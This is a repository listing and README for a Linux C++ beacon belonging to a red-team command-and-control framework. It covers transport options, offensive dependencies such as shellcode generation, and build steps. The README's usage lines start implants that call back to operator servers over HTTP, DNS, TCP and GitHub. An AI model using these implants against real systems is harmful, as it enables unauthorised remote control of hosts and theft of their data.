https://github.com/maxdcb/c2linuximplant
Linux C++ Implant for Exploration C2
c2 commandandcontrol cybersecurity redteam
Last synced: about 1 month ago
- Host: GitHub
- URL: https://github.com/maxdcb/c2linuximplant
- Owner: maxDcb
- License: mit
- Created: 2024-11-02T13:30:25.000Z (over 1 year ago)
- Default Branch: master
- Last Pushed: 2025-03-13T13:31:24.000Z (11 months ago)
- Last Synced: 2025-03-13T14:33:13.506Z (11 months ago)
- Topics: c2, commandandcontrol, cybersecurity, redteam
- Language: CMake
- Homepage:
- Size: 170 KB
- Stars: 7
- Watchers: 1
- Forks: 2
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
README
# Exploration C2 Linux Implant
## Overview
**Exploration** is a modular Command and Control (C2) framework designed for red team operations. This repository provides the **Beacon** component implemented in C++ for targeting Linux systems. The associated TeamServer and Client components are available in the [C2TeamServer](https://github.com/maxDcb/C2TeamServer) repository.
Multiple Beacons in this project are capable of communicating with the TeamServer over various channels. Supported transport mechanisms include HTTP/HTTPS, GitHub, DNS, and TCP.
## Communication Examples
```bash
# HTTP/HTTPS
BeaconHttp
BeaconHttp 10.10.10.10 8443 https
BeaconHttp 10.10.10.10 8080 http
# GitHub
BeaconGithub
BeaconGithub maxDcb/C2Implant ghp_dsfgdfhdf5554456g4fdg465...
# DNS
BeaconDns
BeaconDns 8.8.8.8 bac.superdomain.com
# TCP
BeaconTcp
BeaconTcp 127.0.0.1 4444
```
## Build Instructions
### Submodules & External Dependencies
This project utilizes several external libraries and tools:
* [Donut](https://github.com/TheWover/donut): Generates shellcode from PE files.
* [COFFLoader](https://github.com/trustedsec/COFFLoader): Executes object files, such as those in [CS-Situational-Awareness-BOF](https://github.com/trustedsec/CS-Situational-Awareness-BOF).
* [cpp-base64](https://github.com/ReneNyffenegger/cpp-base64): Provides base64 encoding/decoding.
* [nlohmann/json](https://github.com/nlohmann/json): JSON parsing library.
### Building the Linux Beacons and Modules
Initialize submodules and prepare the build environment:
```bash
git submodule update --init
mkdir build
cd build
```
Compile:
```bash
cmake .. -DCMAKE_PROJECT_TOP_LEVEL_INCLUDES=./conan_provider.cmake
make -j4
```
The project can also be built with the C2Core package:
```bash
# Download the latest Linux package (run from inside the build directory).
# GITHUB_TOKEN is optional; when set it is sent as a Bearer token to the GitHub API.
url="$(curl -sH 'Accept: application/vnd.github+json' \
  ${GITHUB_TOKEN:+-H "Authorization: Bearer $GITHUB_TOKEN"} \
  'https://api.github.com/repos/maxDcb/C2Core/releases?per_page=100' \
  | jq -r '[.[] | select(.tag_name|startswith("linux-"))]
    | sort_by(.created_at) | reverse
    | .[0].assets[]
    | select(.name|test("^C2Core-Linux.*"))
    | .browser_download_url' | head -n1)"
# Derive the local file name from the last path component of the URL.
fname="${url##*/}"
curl -L "$url" -o "$fname"
echo "Downloaded: $fname"
# Extract the archive that was actually downloaded, then point CMake at it.
mkdir -p C2Core-Linux && tar -xzf "$fname" -C C2Core-Linux
export CMAKE_PREFIX_PATH="$(pwd)/C2Core-Linux"
cmake .. -DCMAKE_PROJECT_TOP_LEVEL_INCLUDES=./conan_provider.cmake
make -j4
```
### Output Locations
* Compiled Beacons: `Release/Beacons`
* Compiled Modules: `Release/Modules`